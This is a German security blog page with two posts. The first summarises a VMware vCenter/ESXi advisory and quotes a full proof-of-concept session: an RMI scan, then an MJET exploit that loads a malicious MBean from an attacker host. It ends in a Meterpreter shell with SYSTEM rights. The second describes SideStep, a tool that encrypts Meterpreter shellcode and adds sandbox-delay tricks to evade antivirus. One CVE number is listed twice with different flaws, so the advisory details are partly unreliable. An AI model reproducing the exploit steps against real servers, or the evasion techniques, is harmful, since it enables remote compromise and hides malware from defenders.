03 Okt

Kritische Lücke in VMware vCenter Server und ESXi

LOGO1

Advisory ID: VMSA-2015-0007
CVE Numbers: CVE-2015-5177 CVE-2015-2342 CVE-2015-1047

CVE-2015-5177 – kritisch
Fehler im JMX-RMI-Service im vCenter Server. – Remote Code Execution
Hier ist bereits ein Metasploit Modul verfügbar.

Proof of Concept:
root@Whack:/opt/mjet# nmap -sS 1.1.1.2 -p 9875 –script=/usr/share/nmap/scripts/rmi-dumpregistry.nse
Starting Nmap 6.47 ( http://nmap.org ) at 2015-04-15 16:56 BST
Nmap scan report for 1.1.1.2
Host is up (0.00036s latency).
PORT STATE SERVICE
9875/tcp open java-rmi
| rmi-dumpregistry:
| jmxrmi
| javax.management.remote.rmi.RMIServerImpl_Stub
| @1.1.1.2:50966
| extends
| java.rmi.server.RemoteStub
| extends
|_ java.rmi.server.RemoteObject
MAC Address: 00:0C:29:D1:00:30 (VMware)
root@Whack:/opt/mjet# java -jar mjet.jar -t 1.1.1.2 -p 9875 -u http://1.1.1.1:8080/TArDcls4aeQZVWl
---------------------------------------------------
MJET - Mogwai Security JMX Exploitation Toolkit 0.1
--------------------------------------------------- 
[+] Connecting to JMX URL: service:jmx:rmi:///jndi/rmi://1.1.1.2:9875/jmxrmi ...
[+] Connected: rmi://1.1.1.2 16
[+] Trying to create MLet bean...
[+] Loaded javax.management.loading.MLet
[+] Loading malicious MBean from http://1.1.1.1:8080/TArDcls4aeQZVWl
[+] Invoking: javax.management.loading.MLet.getMBeansFromURL
[+] Loaded class: metasploit.Metasploit
[+] Loaded MBean Server ID: drmwfzvo:name=NApCjRCB,id=gsKsVVHK
[+] Invoking: metasploit.Metasploit.run()
[+] Done
Metasploit Shell
-------------------------
2015-02-24 10:11:44 +0000 S:0 J:3 msf exploit(java_mlet_server) >
[*] Using URL: http://1.1.1.1:8080/TArDcls4aeQZVWl
[*] Server started.
[*] 1.1.1.2 java_mlet_server - handling request for /TArDcls4aeQZVWl
[*] 1.1.1.2 java_mlet_server - handling request for /TArDcls4aeQZVWl/
[*] 1.1.1.2 java_mlet_server - handling request for /W5PqWUoBP/JOqDKhBd.jar
[*] 1.1.1.2 java_mlet_server - handling request for /W5PqWUoBP/JOqDKhBd.jar
[*] Sending stage (30355 bytes) to 1.1.1.2
[*] Meterpreter session 1 opened (1.1.1.1:4444 -> 1.1.1.2:50456) at 2015-02-24 10:12:32 +0000
 
2015-02-24 10:14:10 +0000 S:1 J:3 msf exploit(java_mlet_server) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > getuid
Server username: SYSTEM

CVE-2015-5177:
Fehler in der OpenSLP-Funktion – Remote Code Execution
Betroffene Versionen 5.0, 5.1 und 5.5

CVE-2015-1047:
Der vpxd Service bei den Versionen 5.0,5.1 und 5.5 ist für DoS-Attacken anfällig.

Entsprechende Updates sind bei VMware bereits verfügbar.

04 Jul

SideStep: AV Evasion Tool

SideStep is a nice tool to bypass anti-virus software. The tool generates Metasploit payloads encrypted using the CryptoPP library, and uses several other techniques to evade AV.

SideStep generates Meterpreter shellcode, randomly generates an encryption key, and then encrypts the shellcode using AES-128bit with the random key. All variables and function names are also randomly generated.

In addition, to encrypting the shellcode and assigning random names, it also generates a configurable number of random variables with configurable value lengths. Surprisingly, this can also help evade AV.

To evade AV sandboxes, I implemented a function that checks the current time, and then loops until a configurable number of seconds have passed since the current time. As an added small time function, I have added support for generating 1024 or 2048bit DH parameters. I chose these methods as I’ve read that some AV hook sleep function calls.

SideStep can also be configured to strip debugging and other symbol information from the final executable and then randomly encode the assembly instructions using peCloak.

Source: GitHub
More info: Here..